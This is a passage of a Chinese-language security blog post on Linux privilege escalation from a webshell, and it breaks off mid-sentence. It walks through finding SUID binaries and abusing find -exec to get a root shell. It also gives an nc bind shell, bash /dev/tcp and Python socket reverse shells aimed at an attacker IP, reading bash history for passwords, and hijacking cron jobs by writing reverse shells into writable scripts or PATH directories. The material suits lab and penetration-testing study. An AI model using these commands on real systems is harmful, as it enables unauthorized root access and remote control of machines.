
<!DOCTYPE html><html lang="en">

<head>
  <meta charset="utf-8">
  <meta name="hexo-theme" content="https://github.com/xaoxuu/hexo-theme-stellar/tree/1.33.1" theme-name="Stellar" theme-version="1.33.1">
  
  
  <meta name="generator" content="Hexo 6.3.0">
  <meta http-equiv='x-dns-prefetch-control' content='on' />
  
  <meta name="renderer" content="webkit">
  <meta name="force-rendering" content="webkit">
  <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1">
  <meta name="HandheldFriendly" content="True" >
  <meta name="mobile-web-app-capable" content="yes">
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="theme-color" media="(prefers-color-scheme: dark)" content="#000">
  <meta name="theme-color" content="#f9fafb">
  <title>linux webshell提权 - Sherlock</title>

  
    <meta name="description" content="参考Linux suid提权 Linux suid提权什么是suidsuid(set uid)是linux中的一种特殊权限，suid可以让调用者以文件拥有者身份运行该文件，所以利用suid提权的核心就是运行root用户所拥有的suid的文件，那么运行该文件的时候就得获得root用户的身份了。 suid特点是用户运行某个程序时，如果该程序有suid权限，程序运行进程的属主不是发起者，而是程序文件所属">
<meta property="og:type" content="article">
<meta property="og:title" content="linux webshell提权">
<meta property="og:url" content="http://example.com/2025/08/15/linux-webshell%E6%8F%90%E6%9D%83/">
<meta property="og:site_name" content="Sherlock">
<meta property="og:description" content="参考Linux suid提权 Linux suid提权什么是suidsuid(set uid)是linux中的一种特殊权限，suid可以让调用者以文件拥有者身份运行该文件，所以利用suid提权的核心就是运行root用户所拥有的suid的文件，那么运行该文件的时候就得获得root用户的身份了。 suid特点是用户运行某个程序时，如果该程序有suid权限，程序运行进程的属主不是发起者，而是程序文件所属">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://example.com/themes/hexo-theme-stellar/1.jpg">
<meta property="article:published_time" content="2025-08-15T08:12:42.000Z">
<meta property="article:modified_time" content="2025-09-10T13:05:13.704Z">
<meta property="article:author" content="Sherlock">
<meta property="article:tag" content="智商不够,勤勉来凑;眼神不太好">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/themes/hexo-theme-stellar/1.jpg">
  
  
  
  <meta name="keywords" content="智商不够,勤勉来凑;眼神不太好">

  <!-- feed -->
  

  <link rel="stylesheet" href="/css/main.css?v=1.33.1">


  

  

  <script type="application/ld+json">{"@context":"https://schema.org","@type":"BlogPosting","author":{"@type":"Person","name":"Sherlock","sameAs":[],"image":"/themes/hexo-theme-stellar/1.jpg"},"dateCreated":"2025-08-15T16:12:42+08:00","dateModified":"2025-09-10T21:05:13+08:00","datePublished":"2025-08-15T16:12:42+08:00","description":"","headline":"linux webshell提权","mainEntityOfPage":{"@type":"WebPage","@id":"http://example.com/2025/08/15/linux-webshell%E6%8F%90%E6%9D%83/"},"publisher":{"@type":"Organization","name":"Sherlock","sameAs":[],"image":"/themes/hexo-theme-stellar/1.jpg","logo":{"@type":"ImageObject","url":"/themes/hexo-theme-stellar/1.jpg"}},"url":"http://example.com/2025/08/15/linux-webshell%E6%8F%90%E6%9D%83/","image":[]}</script>
  
</head>
<body>

<div class="l_body content" id="start" layout="post" type="tech" ><aside class="l_left"><div class="sidebg"></div><div class="leftbar-container">


<header class="header"><div class="logo-wrap"><a class="avatar" href="/about/"><div class="bg" style="opacity:0;background-image:url(https://gcore.jsdelivr.net/gh/cdn-x/placeholder@1.0.12/avatar/round/rainbow64@3x.webp);"></div><img no-lazy class="avatar" src="/themes/hexo-theme-stellar/1.jpg" onerror="javascript:this.classList.add('error');this.src='https://gcore.jsdelivr.net/gh/cdn-x/placeholder@1.0.12/image/2659360.svg';"></a><a class="title" href="/"><div class="main">Sherlock</div><div class="sub cap">言念君子，温其如玉</div></a></div></header>

<div class="nav-area">

<nav class="menu dis-select"><a class="nav-item active" title="博客" href="/" style="color:#1BCDFC"><svg xmlns="http://www.w3.org/2000/svg" width="32" height="32" viewBox="0 0 24 24"><path fill="currentColor" fill-rule="evenodd" d="M5.879 2.879C5 3.757 5 5.172 5 8v8c0 2.828 0 4.243.879 5.121C6.757 22 8.172 22 11 22h2c2.828 0 4.243 0 5.121-.879C19 20.243 19 18.828 19 16V8c0-2.828 0-4.243-.879-5.121C17.243 2 15.828 2 13 2h-2c-2.828 0-4.243 0-5.121.879M8.25 17a.75.75 0 0 1 .75-.75h3a.75.75 0 0 1 0 1.5H9a.75.75 0 0 1-.75-.75M9 12.25a.75.75 0 0 0 0 1.5h6a.75.75 0 0 0 0-1.5zM8.25 9A.75.75 0 0 1 9 8.25h6a.75.75 0 0 1 0 1.5H9A.75.75 0 0 1 8.25 9" clip-rule="evenodd"/><path fill="currentColor" d="M5.235 4.058C5 4.941 5 6.177 5 8v8c0 1.823 0 3.058.235 3.942L5 19.924c-.975-.096-1.631-.313-2.121-.803C2 18.243 2 16.828 2 14v-4c0-2.829 0-4.243.879-5.121c.49-.49 1.146-.707 2.121-.803zm13.53 15.884C19 19.058 19 17.822 19 16V8c0-1.823 0-3.059-.235-3.942l.235.018c.975.096 1.631.313 2.121.803C22 5.757 22 7.17 22 9.999v4c0 2.83 0 4.243-.879 5.122c-.49.49-1.146.707-2.121.803z" opacity=".5"/></svg></a><a class="nav-item" title="社交" href="/friends/" style="color:#F44336"><svg xmlns="http://www.w3.org/2000/svg" width="32" height="32" viewBox="0 0 24 24"><path fill="currentColor" d="m13.629 20.472l-.542.916c-.483.816-1.69.816-2.174 0l-.542-.916c-.42-.71-.63-1.066-.968-1.262c-.338-.197-.763-.204-1.613-.219c-1.256-.021-2.043-.098-2.703-.372a5 5 0 0 1-2.706-2.706C2 14.995 2 13.83 2 11.5v-1c0-3.273 0-4.91.737-6.112a5 5 0 0 1 1.65-1.651C5.59 2 7.228 2 10.5 2h3c3.273 0 4.91 0 6.113.737a5 5 0 0 1 1.65 1.65C22 5.59 22 7.228 22 10.5v1c0 2.33 0 3.495-.38 4.413a5 5 0 0 1-2.707 2.706c-.66.274-1.447.35-2.703.372c-.85.015-1.275.022-1.613.219c-.338.196-.548.551-.968 1.262" opacity=".5"/><path fill="currentColor" d="M10.99 14.308c-1.327-.978-3.49-2.84-3.49-4.593c0-2.677 2.475-3.677 4.5-1.609c2.025-2.068 4.5-1.068 4.5 1.609c0 1.752-2.163 3.615-3.49 4.593c-.454.335-.681.502-1.01.502c-.329 0-.556-.167-1.01-.502"/></svg></a></nav>
</div>
<div class="widgets">
<div class="search-wrapper" id="search-wrapper"><form class="search-form"><a class="search-button" onclick="document.getElementById(&quot;search-input&quot;).focus();"><svg t="1705074644177" viewBox="0 0 1025 1024" version="1.1" xmlns="http://www.w3.org/2000/svg" p-id="1560" width="200" height="200"><path d="M1008.839137 935.96571L792.364903 719.491476a56.783488 56.783488 0 0 0-80.152866 0 358.53545 358.53545 0 1 1 100.857314-335.166073 362.840335 362.840335 0 0 1-3.689902 170.145468 51.248635 51.248635 0 1 0 99.217358 26.444296 462.057693 462.057693 0 1 0-158.255785 242.303546l185.930047 185.725053a51.248635 51.248635 0 0 0 72.568068 0 51.248635 51.248635 0 0 0 0-72.978056z" p-id="1561"></path><path d="M616.479587 615.969233a50.428657 50.428657 0 0 0-61.498362-5.534852 174.655348 174.655348 0 0 1-177.525271 3.484907 49.403684 49.403684 0 0 0-58.833433 6.76482l-3.074918 2.869923a49.403684 49.403684 0 0 0 8.609771 78.10292 277.767601 277.767601 0 0 0 286.992355-5.739847 49.403684 49.403684 0 0 0 8.404776-76.667958z" p-id="1562"></path></svg></a><input type="text" class="search-input" id="search-input" placeholder="Search"></form><div id="search-result"></div><div class="search-no-result">No Results!</div></div>



<widget class="widget-wrapper recent post-list"><div class="widget-header dis-select"><span class="name">Recent Update</span></div><div class="widget-body fs14"><a class="item title" href="/2024/10/24/java%E7%B1%BB%E5%8A%A0%E8%BD%BD/"><span class="title">java类加载</span></a><a class="item title" href="/2025/06/30/xss%E5%9C%A8%E4%BC%81%E4%B8%9Asrc%E4%B8%AD%E7%9A%84%E6%8C%96%E6%8E%98%E5%A7%BF%E5%8A%BF/"><span class="title">xss在企业src中的挖掘姿势</span></a><a class="item title" href="/2025/08/23/CodeQl-%E5%85%A5%E9%97%A8/"><span class="title">CodeQl 入门</span></a><a class="item title" href="/2025/08/15/%E5%8F%8D%E5%BC%B9shell%E5%8D%87%E7%BA%A7%E4%B8%BA%E5%AE%8C%E5%85%A8%E4%BA%A4%E4%BA%92%E5%BC%8Fshell/"><span class="title">反弹shell升级为完全交互式shell</span></a><a class="item title" href="/2025/08/15/linux-webshell%E6%8F%90%E6%9D%83/"><span class="title">linux webshell提权</span></a><a class="item title" href="/2025/08/20/Tomcat-URL%E8%A7%A3%E6%9E%90%E5%B7%AE%E5%BC%82%E6%80%A7%E5%AF%BC%E8%87%B4%E7%9A%84%E5%AE%89%E5%85%A8%E9%97%AE%E9%A2%98/"><span class="title">Tomcat URL解析差异性导致的安全问题</span></a><a class="item title" href="/2025/08/20/%E6%98%A5%E7%A7%8B%E4%BA%91%E9%95%9C-initial/"><span class="title">春秋云镜-initial</span></a><a class="item title" href="/2025/04/28/java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E4%B9%8Byso%E4%B8%AD%E7%9A%84spring%E9%93%BE%E5%AD%90%E5%88%86%E6%9E%90/"><span class="title">java反序列化之yso中的spring链子分析</span></a><a class="item title" href="/2025/08/01/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1-jshERP-3-5/"><span class="title">代码审计-jshERP-3.5</span></a><a class="item title" href="/2025/07/20/CTF-java%E4%B8%93%E9%A2%98/"><span class="title">CTF-java专题</span></a></div></widget>
</div>

</div></aside><div class="l_main" id="main">





<div class="article banner top">
  <div class="content">
    <div class="top bread-nav footnote"><div class="left"><div class="flex-row" id="breadcrumb"><a class="cap breadcrumb" href="/">Home</a>
<span class="sep"></span><a class="cap breadcrumb" href="/">Blog</a><span class="sep"></span><a class="cap breadcrumb-link" href="/categories/%E6%B8%97%E9%80%8F/">渗透</a></div>
<div class="flex-row" id="post-meta"><span class="text created">Posted on: <time datetime="2025-08-15T08:12:42.000Z">2025-08-15</time></span><span class="sep updated"></span><span class="text updated">Updated on: <time datetime="2025-09-10T13:05:13.704Z">2025-09-10</time></span></div></div></div>
    
    <div class="bottom only-title">
      
      <div class="text-area">
        <h1 class="text title"><span>linux webshell提权</span></h1>
        
      </div>
    </div>
    
  </div>
  </div><article class="md-text content"><h1 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h1><p><a target="_blank" rel="noopener" href="https://xz.aliyun.com/news/11981">Linux suid提权</a></p>
<h1 id="Linux-suid提权"><a href="#Linux-suid提权" class="headerlink" title="Linux suid提权"></a>Linux suid提权</h1><h2 id="什么是suid"><a href="#什么是suid" class="headerlink" title="什么是suid"></a>什么是suid</h2><p>suid(set uid)是linux中的一种特殊权限，suid可以让调用者以文件拥有者身份运行该文件，所以利用suid提权的核心就是运行root用户所拥有的suid的文件，那么运行该文件的时候就得获得root用户的身份了。</p>
<p>suid特点是用户运行某个程序时，如果该程序有suid权限，程序运行进程的属主不是发起者，而是程序文件所属的属主。</p>
<p>linux引入了3个文件来管理用户组：</p>
<ol>
<li>&#x2F;etc&#x2F;passwd存放用户信息。</li>
<li>&#x2F;etc&#x2F;shadow存放用户密码信息。</li>
<li>&#x2F;etc&#x2F;group存放组信息。</li>
</ol>
<p>在文件系统中的每个文件的文件头里面添加了用户和文件之间的关系信息。</p>
<p>用户信息&#x2F;etc&#x2F;passwd每行共有7个字段冒号隔开：</p>
<p>字段1为用户名。</p>
<p>字段2为用户的密码。</p>
<p>字段3为指UID，每个用户都有自己的uid。</p>
<p>字段4为组UID，每个用户都有不同的uid。</p>
<p>字段5为解释说明的字段。</p>
<p>字段6为指用户的根目录。</p>
<p>字段7为指登录shell，用户登录shell，当前为&#x2F;bin&#x2F;zsh表示可以登录，&#x2F;sbin&#x2F;nologin标识不被授权登录。</p>
<p><img src="/../source/imgs/$%7Bfiilname%7D/20230519193015-86de38a8-f638-1.png" alt="img"></p>
<h2 id="如何利用"><a href="#如何利用" class="headerlink" title="如何利用"></a>如何利用</h2><p>在执行过程中，调用者会暂时获得该文件的所有者权限，且该权限只在程序执行的过程中有效。</p>
<p>只有root用户的uid是0，如果把一个普通用户的uid修改为0，那么只要以普通用户的用户名和密码登录系统就会自动切换到root用户，在系统加固时一定要找出有哪些用户的uid为0。</p>
<p>假设可执行文件binexec其属主为root，当以非root身份登录时，如binexec设置了suid权限，就可以在非root身份下运行该可执行文件，可执行文件运行时该进程的权限为root权限。</p>
<p>利用此特性，就可通过suid进行提权。</p>
<h2 id="如何设置suid"><a href="#如何设置suid" class="headerlink" title="如何设置suid"></a>如何设置suid</h2><p>利用</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">chmod u+s filename #设置suid</span><br><span class="line">chmod u-s filename #去除suid</span><br></pre></td></tr></table></figure>

<p><img src="/../source/imgs/$%7Bfiilname%7D/20230519193022-8a7c981a-f638-1.png" alt="img"></p>
<p>可以看见，我们示例的图片由 -rw变为了-rwS,所以就是添加上了suid权限</p>
<h2 id="如何查找suid文件"><a href="#如何查找suid文件" class="headerlink" title="如何查找suid文件"></a>如何查找suid文件</h2><p>具有suid权限的二进制可执行文件有：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">nmap</span><br><span class="line">vim</span><br><span class="line">find</span><br><span class="line">bash</span><br><span class="line">more</span><br><span class="line">less</span><br><span class="line">nano</span><br><span class="line">cp</span><br><span class="line">awk</span><br></pre></td></tr></table></figure>

<p>从网上找了几个常见的命令</p>
<p>更多有关suid的可以看<a target="_blank" rel="noopener" href="https://gtfobins.github.io/">GTFOBins</a></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">find / -user root -perm -4000 -print 2&gt;/dev/null</span><br><span class="line">find / -perm -u=s -type f 2&gt;/dev/null</span><br><span class="line">find / -user root -perm -4000 -exec ls -ldb &#123;&#125; \;</span><br></pre></td></tr></table></figure>

<p>以find &#x2F; -perm -u&#x3D;s -type f 2&gt;&#x2F;dev&#x2F;null讲解一下各个参数代表什么</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">find / -perm -u=s -type f 2&gt;/dev/null</span><br><span class="line">/表示从文件系统的顶部（根）开始并找到每个目录</span><br><span class="line">-perm 表示搜索随后的权限</span><br><span class="line">-u = s表示查找root用户拥有的文件</span><br><span class="line">-type表示我们正在寻找的文件类型</span><br><span class="line">f 表示常规文件，而不是目录或特殊文件</span><br><span class="line">2表示该进程的第二个文件描述符，即stderr（标准错误）</span><br><span class="line">&gt;表示重定向</span><br><span class="line">/dev/null是一个特殊的文件系统对象，它将丢弃写入其中的所有内容。</span><br></pre></td></tr></table></figure>

<p><img src="/../source/imgs/$%7Bfiilname%7D/20230519193036-935470fc-f638-1.png" alt="img"></p>
<p>利用以上这几个命令可以找到正在系统上运行的所有suid可执行文件。</p>
<p>也可以使用sudo -l 列出当前用户可执行的命令</p>
<p>举个例子，我这里用Newstar的靶机演示了</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">find / -user root -perm -4000 -exec ls -ldb &#123;&#125; \;</span><br></pre></td></tr></table></figure>

<p><img src="/../source/imgs/$%7Bfiilname%7D/20230519193043-970144fa-f638-1.png" alt="img"></p>
<p>ls一下看看是否设置了suid权限</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ls -al /usr/bin/su</span><br></pre></td></tr></table></figure>

<p><img src="/../source/imgs/$%7Bfiilname%7D/20230519193049-9a927058-f638-1.png" alt="img"></p>
<p>可以看到确实设置了suid权限，而且属主为root，现在我们是不是可以利用我们之前提到的suid可执行二进制文件从而进行提权呢</p>
<h2 id="进行suid提权（这里就记一个find）"><a href="#进行suid提权（这里就记一个find）" class="headerlink" title="进行suid提权（这里就记一个find）"></a>进行suid提权（这里就记一个find）</h2><p><strong>这里的前提都是要有suid权限</strong></p>
<h3 id="find"><a href="#find" class="headerlink" title="find"></a>find</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">find 具有suid权限的filename -exec whoami \; -quit</span><br><span class="line">#root</span><br><span class="line">find 具有suid权限的filename -exec /bin/sh -p \; -quit</span><br><span class="line">#whoami</span><br><span class="line">#root</span><br></pre></td></tr></table></figure>

<p><img src="/../source/imgs/$%7Bfiilname%7D/20230519193055-9e2420c2-f638-1.png" alt="img"></p>
<p>还有一种差不多的提权方法</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">#先前利用以上查找suid文件查询到了/usr/bin/find 有suid权限</span><br><span class="line">touch 1.txt #创建1.txt</span><br><span class="line">/usr/bin/find 1.txt -exec whoami \;</span><br></pre></td></tr></table></figure>

<p><img src="/../source/imgs/$%7Bfiilname%7D/20230519193100-a1814d8a-f638-1.png" alt="img"></p>
<p>广播shell</p>
<p>在靶机上：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">find user -exec nc -lvp 4444 -e &#x27;/bin/sh&#x27; \;</span><br></pre></td></tr></table></figure>

<p>在攻击机上：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nc 靶机ip 4444</span><br></pre></td></tr></table></figure>

<p>反弹shell</p>
<p>在靶机上:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">find 具有suid权限的filename -exec bash -c &#x27;bash -i &gt;&amp; /dev/tcp/ip/port 0&gt;&amp;1&#x27; \;</span><br></pre></td></tr></table></figure>

<p>在攻击机上：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nc -lvp port</span><br></pre></td></tr></table></figure>

<p><img src="/../source/imgs/$%7Bfiilname%7D/20230519193106-a53d41e0-f638-1.png" alt="img"></p>
<p>这里我延申一下，也可以写一个反弹root的shell</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">python -c &#x27;import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((&quot;ip&quot;,port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([&quot;/bin/sh&quot;,&quot;-i&quot;]);&#x27;</span><br><span class="line">nc -lvp port</span><br></pre></td></tr></table></figure>

<p><img src="/../source/imgs/$%7Bfiilname%7D/20230519193112-a8588e8e-f638-1.png" alt="img"></p>
<p>这里也可以结合之前的命令</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/usr/bin/find 1.txt -exec python -c  &#x27;import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((&quot;ip&quot;,port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([&quot;/bin/sh&quot;,&quot;-i&quot;]);&#x27; \;</span><br></pre></td></tr></table></figure>

<h3 id="一些奇奇怪怪的提权"><a href="#一些奇奇怪怪的提权" class="headerlink" title="一些奇奇怪怪的提权"></a>一些奇奇怪怪的提权</h3><h4 id="通过查询历史记录从而获得信息泄露的信息"><a href="#通过查询历史记录从而获得信息泄露的信息" class="headerlink" title="通过查询历史记录从而获得信息泄露的信息"></a>通过查询历史记录从而获得信息泄露的信息</h4><p>利用以下命令可以获取</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cat ~/.bash_history</span><br></pre></td></tr></table></figure>

<p>这个命令可以查看当前用户使用过的历史命令</p>
<p>有可能会得到root登录的密码</p>
<p><img src="/../source/imgs/$%7Bfiilname%7D/20230519193152-c0705538-f638-1.png" alt="img"></p>
<h4 id="linux配置错误从而提权"><a href="#linux配置错误从而提权" class="headerlink" title="linux配置错误从而提权"></a>linux配置错误从而提权</h4><p>利用linuxprivchecker：<a target="_blank" rel="noopener" href="https://www.securitysift.com/download/linuxprivchecker.py">https://www.securitysift.com/download/linuxprivchecker.py</a></p>
<p><strong>unix-privesc-check</strong>：<a target="_blank" rel="noopener" href="http://pentestmonkey.net/tools/audit/unix-privesc-check">http://pentestmonkey.net/tools/audit/unix-privesc-check</a></p>
<p>这两个工具进行查找linux中配置错误的文件</p>
<h3 id="计划任务提权"><a href="#计划任务提权" class="headerlink" title="计划任务提权"></a>计划任务提权</h3><h4 id="文件覆盖"><a href="#文件覆盖" class="headerlink" title="文件覆盖"></a>文件覆盖</h4><p>计划任务由 crontab 管理，非 root 用户是无法列出 root 用户的计划任务的，但可以列出 &#x2F;etc 的系统任务，系统任务默认是 root 权限运行的</p>
<p>如果某些定时任务是以 <strong>root</strong> 身份运行的，但它调用的 <strong>脚本&#x2F;可执行文件</strong> 或 <strong>日志文件</strong> 权限设置不当，被普通用户可修改，那么普通用户就可以在其中插入恶意命令，从而获得 <strong>root 权限</strong></p>
<p><img src="/../source/imgs/$%7Bfiilname%7D/20230519193157-c34df008-f638-1.png" alt="img"></p>
<p>常见检查点：</p>
<ol>
<li><p><strong>查看定时任务的配置文件：</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">cat /etc/crontab</span><br><span class="line">ls -l /etc/cron*</span><br></pre></td></tr></table></figure>

<p>这些里面的任务很多都是 root 执行的。</p>
</li>
<li><p><strong>列出系统中所有用户的 crontab：</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ls -l /var/spool/cron/</span><br></pre></td></tr></table></figure>

<p>普通用户一般只能改自己的，但 root 的脚本要重点关注。</p>
</li>
<li><p><strong>检查 cron 调用的脚本&#x2F;命令是否可写：</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">grep -R &quot;&quot; /etc/cron* 2&gt;/dev/null</span><br></pre></td></tr></table></figure>

<p>然后逐个 <code>ls -l</code> 查看脚本是否对普通用户可写。</p>
</li>
<li><p><strong>快速查找所有 root 任务涉及的可写文件：</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">for file in $(grep -oP &#x27;(?&lt;=\s)/[^\s]+&#x27; /etc/crontab /etc/cron.*/* 2&gt;/dev/null); do</span><br><span class="line">    if [ -w &quot;$file&quot; ]; then</span><br><span class="line">        echo &quot;[+] Writable: $file&quot;</span><br><span class="line">    fi</span><br><span class="line">done</span><br></pre></td></tr></table></figure>

<p>这段脚本会找出计划任务调用的文件，并检查是否对当前用户可写</p>
</li>
</ol>
<p><em><strong>举一个简单的例子</strong></em></p>
<p>假设 <code>/etc/crontab</code> 中有这样一行：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">* * * * * root /usr/local/bin/backup.sh</span><br></pre></td></tr></table></figure>

<p>再看文件权限：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">ls -l /usr/local/bin/backup.sh</span><br><span class="line">-rwxrwxrwx 1 root root 1234 Sep 10 20:00 /usr/local/bin/backup.sh</span><br></pre></td></tr></table></figure>

<p>发现 <code>backup.sh</code> 是 <strong>所有用户可写</strong> (<code>777</code>)，那么普通用户就可以这样：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">echo &quot;bash -i &gt;&amp; /dev/tcp/127.0.0.1/4444 0&gt;&amp;1&quot; &gt;&gt; /usr/local/bin/backup.sh</span><br></pre></td></tr></table></figure>

<p>然后在攻击机监听：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nc -lvnp 4444</span><br></pre></td></tr></table></figure>

<p>下一次 cron 执行时（每分钟），你就会得到一个 <strong>root shell</strong></p>
<h4 id="环境变量劫持"><a href="#环境变量劫持" class="headerlink" title="环境变量劫持"></a>环境变量劫持</h4><p><strong>原理</strong></p>
<ul>
<li><p><strong>cron 任务默认是以 root 身份运行的</strong>。</p>
</li>
<li><p>如果在 cron 中没有写绝对路径，而是写了一个命令名，比如：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">* * * * * root backup</span><br></pre></td></tr></table></figure>

<p>系统会去 <code>$PATH</code> 环境变量指定的路径里依次找 <code>backup</code> 这个可执行文件。</p>
</li>
<li><p>如果攻击者能控制 PATH（或者 cron 任务执行时 PATH 包含了一个 <strong>可写目录</strong>，如 <code>/tmp</code>），就能在那个目录下放一个同名的恶意程序。</p>
</li>
<li><p>cron 运行时就会执行我们伪造的程序，从而拿到 root 权限。</p>
</li>
</ul>
<hr>
<p><strong>检查方法</strong></p>
<ol>
<li><p><strong>查看 &#x2F;etc&#x2F;crontab 和 &#x2F;etc&#x2F;cron.* 文件</strong>，看看任务有没有用相对命令（例如 <code>backup</code>、<code>tar</code>、<code>python</code>）而不是绝对路径（如 <code>/usr/bin/tar</code>）。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">cat /etc/crontab</span><br><span class="line">cat /etc/cron.d/*</span><br></pre></td></tr></table></figure>
</li>
<li><p><strong>检查 cron 环境变量设置</strong><br> 在 <code>/etc/crontab</code> 中，前几行可能有：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">SHELL=/bin/sh</span><br><span class="line">PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin</span><br></pre></td></tr></table></figure>

<p>如果 PATH 中有一个可写目录（比如 <code>/tmp</code>），那么就有机会劫持。</p>
</li>
<li><p><strong>检测可写目录</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">for dir in $(echo $PATH | tr &quot;:&quot; &quot; &quot;); do</span><br><span class="line">    [ -w &quot;$dir&quot; ] &amp;&amp; echo &quot;[+] Writable: $dir&quot;</span><br><span class="line">done</span><br></pre></td></tr></table></figure></li>
</ol>
<hr>
<p><strong>举个例子</strong></p>
<p>假设 <code>/etc/crontab</code> 中有：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">* * * * * root backup</span><br></pre></td></tr></table></figure>

<p>同时 <code>PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/tmp</code></p>
<p>这里 <code>/tmp</code> 是所有用户可写的。</p>
<p>攻击步骤：</p>
<ol>
<li><p>在 <code>/tmp</code> 下创建一个恶意程序 <code>backup</code>：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">echo &#x27;#!/bin/bash&#x27; &gt; /tmp/backup</span><br><span class="line">echo &#x27;bash -i &gt;&amp; /dev/tcp/127.0.0.1/4444 0&gt;&amp;1&#x27; &gt;&gt; /tmp/backup</span><br><span class="line">chmod +x /tmp/backup</span><br></pre></td></tr></table></figure>
</li>
<li><p>攻击机监听端口：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nc -lvnp 4444</span><br></pre></td></tr></table></figure>
</li>
<li><p>等待 cron 下次运行（每分钟执行一次）。</p>
</li>
</ol>
<p>结果：<br> root 会执行 <code>/tmp/backup</code>（因为 PATH 优先级），攻击者就能拿到 root shell</p>
<blockquote>
<p> PATH 优先级的原理</p>
<p>当 Linux 执行一个命令时，如果没有写绝对路径（比如直接写 <code>backup</code> 而不是 <code>/usr/bin/backup</code>），系统会按照 <code>$PATH</code> 环境变量里的目录顺序依次查找。</p>
<p>举个例子：</p>
